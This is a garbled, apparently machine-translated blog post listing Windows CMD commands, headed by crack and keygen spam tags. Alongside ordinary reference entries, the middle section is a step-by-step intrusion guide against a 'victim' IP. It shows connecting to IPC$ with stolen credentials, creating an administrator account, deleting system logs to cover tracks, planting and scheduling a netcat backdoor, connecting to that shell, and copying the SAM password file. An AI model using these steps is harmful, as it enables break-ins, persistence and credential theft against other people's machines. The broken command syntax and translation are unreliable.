Most popular CMD commands in Windows XP 7 8 10

Tag: Most popular CMD commands in Windows XP 7 8 10 full keygen, full key, full crack, portable, full serial key, lastest, 32 & 64 bit, for windows 7 8 10, free download



Synthesis of basic commands in Windows XP cmd 7 8 most popular , how to fix, fix hardware and software , to the network, resource management systems , peripherals by CMD, the CMD informed use , or use basic commands cmd, best computer tips ,
In Windows or manipulate us by clicking on the graphical user interface, which can be used alongside the cmd (dos environment) also brought a lot of unexpected effects.
To open a cmd window, press  Windows + R  -> Window  Run , type  cmd  press  enter Any unknown command syntax, add the /? back to list of command parameters. 

For example: ping / ?, will be as follows

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
            [-r count] [-s count] [[-j host-list] | [-k host-list]]
            [-w timeout] [-R] [-S srcaddr] [-4] [-6] target_name

Options:
    -t             Ping the specified host until stopped.
                   To see statistics and continue - type Control-Break;
                   To stop - type Control-C.
    -a             Resolve addresses to hostnames.
    -n count       Number of echo requests to send.
    -l size        Send buffer size.
    -f             Set Don't Fragment flag in packet (IPv4-only).
    -i TTL         Time To Live.
    -v TOS         Type Of Service (IPv4-only. This setting has been deprecated
                   and has no effect on the type of service field in the IP Head
is).
    -r count       Record route for count hops (IPv4-only).
    -s count       Timestamp for count hops (IPv4-only).
    -j host-list   Loose source route along host-list (IPv4-only).
    -k host-list   Strict source route along host-list (IPv4-only).
    -w timeout     Timeout in milliseconds to wait for each reply.
    -R             Use routing header to test reverse route also (IPv6-only).
    -S srcaddr     Source address to use.
    -4 Force using IPv4.
    -6 Force using IPv6.
1. Command  Ping  : Syntax: Code: ping ip / host [/ t] [/ a] [/ L] [/ n] - ip: IP address of the machine to be examined; host is the name of the computer being tested. One can use the IP address or the computer name. - Parameters / t: Use this parameter to the computer constantly "ping" to the destination computer, until you press Ctrl + C - Parameters / a: Get IP address from the host name - parameter / l : Determination of the width of the test packets sent. Some hackers use this parameter to denial-of-service attack a computer (Ping of Death - a type of DoS), but I think as hackers have tools to ping a large packet like this, and to have ping multiple computers at once. - The parameter / n: Determine the number of packets sent. For example: ping 174.178.0.1/n 5 Effects: + This command is used to check whether a computer is connected to the network. Ping command sends packets from your computer to the destination computer sitting. Through the values ​​that the target computer returns for each packet, you can determine the status of the line (for example: send 4 packets but only received 1 packet, indicating very slow connection ( bad)). Or, it can determine which computer is connected or not (If not connected, resulting in a host Disturbed) .... 

2. Command  Tracert  : Syntax: Code: tracert ip / host Utility: + This command will allow you to "see" the path of the packets from your computer to the destination computer, see your packets bypassing server, router or any ... So if you want to probe a particular server. 

3. Command  Net Send , send messages across the network (only on systems using the Win NT / 2000 / XP): Syntax: Net send ip / host thong_diep_muon_goi Effects: + This command will send messages to the destination computer ( IP address or host name) message: thong_diep_muon_goi. + In the LAN, we can use this to chat with each other. In the school's computer lab used tui command to tease people! You may also be sent to all the computers on the LAN according to the following structure: Code: Net send * hello! I'm pro_hacker_invn 

4. The command  netstat  : Syntax: Code: netstat [/ a] [/ f] [/ n] - Parameters / a: Displays all connections and ports are listening (listening) - Parameters / f: show Statistical information Display Ethernet - parameters / n: Displays addresses and port numbers ... also a few other parameters, type netstat /?for more Utility: + netstat command allows us to list all connections in and out of our computer. 

5. Command  IPCONFIG  : Syntax: Code: ipconfig / all Effect: + This command will allow the display of the computer IP configuration you are using, such as host name, IP address, network mask ... 

6. Commands  FTP  (file transfer): Syntax: Code: ftp ip / host If a successful connection to the server, you will be on display ftp, with the following prompt: Code: ftp> _ Here, you will actually manual manipulation with ftp, instead of the type of program Cute FTP, Flash FXP. If the connection is successful, the program will ask you to enter the User Name, Password. If a valid username and password, you will be allowed to upload, browse files ... on the server. Some basic ftp commands: -CD DIRECTORY: switch to another folder on the server - dir: View a list of files and folders of the current folder on the server - mdir DIRECTORY: Create a new folder named DIRECTORY on the server - rmdir dIRECTORY: Clear (remove directory) a folder on the server - put file: download a file (full path. For example: c: \ tp \ bin \ baitap.exe) from the machine you are used on the server. - Close: Closing session - quit: Exit the ftp program, return to the DOS command mode. There's also a few more orders, we invite you to find out. Effects: + FTP is a protocol used to send and receive files between computers together. Windows was preinstalled ftp command, which acts as a program that runs on the console (text), allows for connection to the ftp server 

7. Orders  Net View  : Syntax: Code: Net View [\\ computer | / Domain [: ten_domain]] Usage: + If only rated net view [enter], it will display a list of computers on the network and domain management of the computer you are using. If you type net view \\ + MyComputerName, will show the sharing of computer resources MyComputerName. After using this command, you can use the net use command to use the shared resources. 

8. Commands  Net Use  : Syntax: Code: net use \\ ip \ ipc $ "pass" / user: "xxx" - ip: IP address of the victim. - Xxx: the user of the victim machine - pass: the user's password Suppose we have a username and password of the victim DC with IP is 68.135.23.25 on the net, we were able to connect to the computer that it already there! For example: user: vitim; pass: 12345. We use the following command: Code: Net use \\ 68.135.23.25 \ ipc $ "12345" / user: "victim" Effects: + connect a computer to the victim IPC $ (begin the process of infiltration). 

9. Orders  Net User  : Syntax: Code: Net User [username pass] [/ add] - Username: username thrilling add - pass: the password of the user to add user When DC add to it already, then we proceed to add this user to group administrator. Code: Net localgroup Administrator [username] [/ add] Effects: + If I just hit the Net User command will display in the computer user. + If you type Net User command [username pass] [/ add], the computer will proceed to add a user. For example, we add a user to conduct called Xuanhoa, password is: banvatoi into the command structure is as follows: Code: Net User Xuanhoa banvatoi / add then add users to the group Xuanhoa adminnistrator Code: net localgroup Xuanhoa Administrator / add 

10. Orders  Shutdown : Syntax: Code: Shutdown [-m \\ ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet ] [-d UPX: yy] (applicable for win XP) - Parameters -m \\ ip: ordered a computer remotely execute commands shutdown, restart, .. - Parameters -t xx: book time for the implementation of the shutdown command. - the parameter -l: logg off (note can not be performed when the remote) - -s parameter: shutdown - -r parameter: shutdown and restart - Parameters -a: none for shutdown - -f parameter: shutdown without warning - Parameters -c "comment": warning before shutdown - UPX -d parameter: yy: not clear Code: shutdown \\ ip (applies win NT ) for more information about the shutdown command you can type shutdown /? for more specific instructions! Utility: + Shutdown the computer. 

11. the command  DIR  : syntax: Code: DIR [drive:] [path] [filename ] this statement too radical it already, make tui from guidance, to more clearly you type the command DIR /? for instructions. Utility: + to view files and folders. 

12. the command  DEL  : syntax: Code: DEL [ drive:] [path] [filename] this command is basically already, not to say nhìu. Uses: Removing a file, usually after entering the system, we must conduct their tracks to avoid being discovered his hien.Sau these are log files of Win NT: Code: del C: \ winnt \ system32 \ logfiles \ *. * del C: \ winnt \ ssytem32 \ config \ *. evt del C: \ winnt \ system32 \ dtclog \ *. * del C: \ winnt \ system32 \ *. log del C: \ winnt \ system32 \ *. txt del C: \ winnt \ *. txt del C: \ winnt \ *. log 

13. Orders virtual drive on the computer: Syntax: Code: net use z: \\ ip \ C $ (or IPC $) - Z is his ... was C $ is the Victim Utility: Create one virtual disk on the computer (this command should not be tui ko clearly detailed instructions DC) 

14. Orders  Net Time  : Syntax: Code: \\ ip Net Time Use: + Tell me the victim of time, then use the AT command to start the program. 

15. Command  AT : Syntax: Code: AT \\ ip Uses: + Usually when the computer enters the victim's retreat I will give souvenirs to the victim computer, when copied or backdoor onto the computer troj rùi I will use the at command to launch them. For example, here tui have children troj nc.exe name (abbreviated from the NC is .... it is a telnet netcat server with port 99) and the copy boarding rùi victim. First we need to know the time of the victim there is IP: 68.135.23.25. Code: Net Time \\ 68.135.23.25 Now in it will get back to us time victim, for example, 12:00. Code: AT \\ 68.135.23.25 12: 3 nc.exe Wait to 12: 3 is that it will automatically run on the victim machine, and we can connected to port 99. 

16. Command  Telnet : Syntax: Code: Type telnet telnet host port /? for more details. But if you stick machine nc victim was then one need only connect to port 99 is Okie Code: telnet 68.135.23.25 99 Effects: + Connect to the host via port xx 

17. Command  COPY : Syntax: Code: COPY /? On to command better! Effects: + Copy, tui from added offline. For example, we copy files on the C drive of your index on drive C of 127.0.0.1 Code: Copy \\ 127.0.0.1 index.html \ C $ \ index.html if you copied to the folder WinNT Code: Copy index.html \\ 127.0.0.1 \ admin $ \ index.html want to copy the files on your computer, you type in victm: Code: Copy \\ 127.0.0.1 \ admin $ \ repair \ sam._c: \ 

18. Command  SET : Syntax: Code: SET Use: + Displays, sets, or bỏ cmd.exe enviroment variables. 19. nbtstat command: Syntax: Code: nbtstat /? Type the command above for more information on this command. Effects: + Display statistic and curent protocol TCP / IP connections using NBT (NetBIOS over TCP? IP) Above are some of my limited knowledge of the CMD, I've read from many different sources, this synthetic reference for everyone. Some commands that you still do not understand the command structure and no conditions should not try to practice technical guidance. Who knows, it contributes look! Looking forward to the pro do not laugh! If your article or find it for a gracious thank nhé 

19  bootcfg  : see section establishing the initial operating system load. 

20  defrag  : This command is used to defragmenting your hard drive. 

21  diskpart  : disk partition manager. We can press DISKPART /? to view detailed usage instructions. 

22  driverquery  : get a list of programs Driver and their attributes. 

23  getmac  : get the MAC address (Media Access Control) of the network card. 

24  Gpresult  : get RSoP, the set set user and group policy settings. 

25  netsh  : network configuration tool. Click NETSH /? for more details . To get rid of this stuff command NETSH> 

26  openfiles  : allows administrator to show or disconnect open files in XP Pro. Click openfiles /? to know more about the parameters. 

27  recover  : recover the information on the disc can not be read. 

28  reg  : tools for the Registry. 

29  schtasks  : Admin can create schedules, change, delete tasks on workstations or the remote machine. Schtasks /? to display the parameters. 

30  sfc  : check file systems, protection and replacement, repair corrupted system files. 

31  shutdown  : you can turn off or restart your computer or admin can turn off or reboot the remote computer. 

32  systeminfo  : displays the basic configuration information. 

33  tasklist  : tell us which programs are running. 

34  taskkill  : disable programs running 

35  dxdiag  : config

Most popular CMD commands in Windows XP 7 8 10 Most popular CMD commands in Windows XP 7 8 10 Reviewed by Tín Nguyễn on 3:17:00 AM Rating: 5

No comments:

Powered by Blogger.